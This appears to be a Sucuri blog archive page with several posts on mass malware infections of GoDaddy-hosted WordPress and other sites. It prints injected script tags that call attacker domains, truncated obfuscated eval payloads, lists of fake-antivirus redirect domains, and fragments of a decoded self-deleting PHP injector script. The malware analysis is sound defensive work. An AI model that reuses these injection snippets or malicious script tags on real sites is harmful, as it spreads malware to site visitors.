Protect Your Interwebs!
We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105
This is caused by this entry that is added to the .htaccess file of the compromised sites:
We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..
Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33
Nothing much different from other web-based malware that we have been tracking. But what is interesting about this attack is how fast the intermediaries domains are changing to avoid detection and getting blacklisted.
These are just some of the ones used in the last 24 hours:
http://defender-dyxa.co.cc/scan1/188
http://antivirus-3879.co.cc/scan1/188
http://antivirus-9465.co.cc/scan1/188
http://antivirus-4274.co.cc/scan1/188
http://yquwtuog.co.cc/scan1/188
http://mrxzvtwt.co.cc/scan1/188
http://lowoxnsm.co.cc/scan1/188
http://iuhcypsp.co.cc/scan1/188
http://vycdmonz.co.cc/scan1/188
http://zgfozmcr.co.cc/scan1/188
http://www4.personaldzfnetwork.rr.nu/?6276f6d=m%2BzgmGuilqSsld7K0KGtjOLZ4LTTo6Rj06Jmo6lqa1s%3D
http://www4.bestuhzscanner.rr.nu/?40ee785=m%2BzgmGuUlqWtm9jj16CUlOLZ3mumo2WjqGRkmp1qbFk%3D
http://www4.savezuzarmy.rr.nu/?47f2246dec=m%2BzgmGulkqieoOXjxa%2Bgn6Lm3muipmtsmWJmaW6XmYc%3D
http://www4.protection-leaderro.xe.cx/?ada145=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KkZKjLY5mpwog%3D
http://www4.protection-leaderri.xe.cx/?55db81=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KeZKjLY5mpllk%3D
http://www4.strongnm-network.rr.nu/?38fdf=m%2BzgmGulpaSolNfX0Wqhi%2Bjr26%2FOX9inY56saJyWlIo%3D
http://www3.personal-tcsoft.rr.nu/?7660a2=m%2Bzgl2uilqSsld7K0Gqniefj0rGRo9hjo6Vua5pgkVY%3D
www3.strongcheckera.rr.nu
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.specialprotectionti.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc
As you can see, changing from .cc, .co.cc, .in., .rr.nu and even some .com in there. Most of them are hosted at 46.252.130.200, but the IP address is changing as well. By checking those on Google, none of them got blacklisted, showing that their tactics are working.
We will keep posting details we learn more.
We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database.
Today, we started to detect that a large number of those sites are being reinfected (and a bunch of new ones are getting hacked too) with a very similar malware string. The major difference is this time the links are pointing to http://lessthenaminutehandle.com/js.php?kk=33 (both hosted at 91.193.194.110).
This hack also injects the malware on every post in the database, but this time encoded as:
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..
It seems that after a few months quiet, the “Hilary Kneber” group is back at it again. Their latest approach is very typical of Hilary Kneber style attacks affecting GoDaddy shared hosts. Basically they modify every PHP file and the database to make sure every page in the infected site is loading malware.
Today, we’ve started to see various WordPress sites infected with the following malware:
<script src "http://welcometotheglobalisnet.com/js.php?kk=25′></script>
Update 1: We are seeing some Vbulletin forums with the database infected. So it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup
Which infects every post in the WordPress database and also modifies all PHP files to generate the above code. Note that the domain is not blacklisted yet so the risk is very high for everyone visiting an infected site.
What the malware does is very simple, it contacts a few domains:
Read More
For the last few days we’ve tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.
This time, the attackers changed tactics and instead of infecting the PHP files, they injected malicious code inside the database. On the WordPress infected sites, they added the following javascript inside every post (on the wp_posts table):
<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>
As you can imagine, this javascript redirects the user to the infamous “Fake AV” pages:
Read More
UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.
Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.
We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.
The following domains/IP addresses are being used to spread the attack:
http://insomniaboldinfoorg.com/ll.php?k=1
www3.hope-soft57.net
www3.new-protectionsoft23.in
www4.free-pc-protection9.inhttp://insomniaboldinfocom.com/mm.php
http://insomniaboldinfonet.com/mm.php
www3.large-defense1.in
We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research is showing this is an ongoing issue that started within the last couple hours.
All the sites we’ve seen so far contain the following javascript added to all PHP files:
<script src="http://myblindstudioinfoonline.com/ll.php"
Which are generated by a very long eval(base64_decode line:
eval(base64_decode("aWYoZnVuY3Rpb....
Here is the malware entry our scanner is detecting:
If you thought your problems at GoDaddy were over, well, not yet.
We’ve confirmed that today at around 3pm EST, GoDaddy servers were hacked again. Malware pointing to cloudisthebestnow.com/kp.php was inserted on thousands of sites hosted by the provider.
This is how the script will look like in your pages:
< script src = http://cloudisthebestnow.com/kp.php >
It will redirect your users to that nasty “fake AV” page again. What’s interesting is that cloudisthebestnow.com is hosted and owned by the same people involved in the latest attacks at GoDaddy.
Read More
Update from GoDaddy: Less than 200 accounts hacked this morning as they were able to contain it before it spread. On their own words:
Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.
Go Daddy is working with other top hosting providers and security experts to gather information to stop to the criminals initiating these exploits.
We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.
As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.
Thank you, Todd Redfoot, Chief Information Security Officer
Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.
Read More
Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html
While GoDaddy was busy blaming its users, one of our friends, K evin Reville, got tired of getting hacked and setup a cron script to monitor his site and alert him when new files were added.
What did he found? He found the malware used by the attackers to infect everyone.
Just to be clear: Nothing to do with WordPress. In fact, in one site we were monitoring, nothing got logged related to WordPress, except this script being called and then deleted. We also saw Joomla sites getting hacked and many other web applications.
So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.
Analysis:
The script in this situation was called “simple_production.php” (but we heard reports of different names being used). It is a base64 decoded file that looks like this: (see it in full MW:SIPRO:1)
eval(base64_decode(“DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3….
Decoded, this is what it does: (see the full content here)
1-First, removes itself:
$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);
2-Encodes the javascript:
$cod=base64_encode(‘< script src=”http://holasionweb.com/oo.php”>
$to_pack=’if(function_exists(\’ob_start\’)&&!isset($GLOBALS[\’mr_n..
3-Scan all directories and add the malware to all php files. After that, prints the number of infected files and exits:
$val=dirname($z);
$totalinjected=0;
echo “Working with $val\n”;
$start_time=microtime(true);
if ($val!=”")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo “|Injected| $totalinjected files in $end_time seconds\n”;
So a simple PHP script is doing all this mess. The issue now is how are they able to inject this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct. It is not a web application bug. What is left is an internal problem at GoDaddy.
If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.
As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.
Comments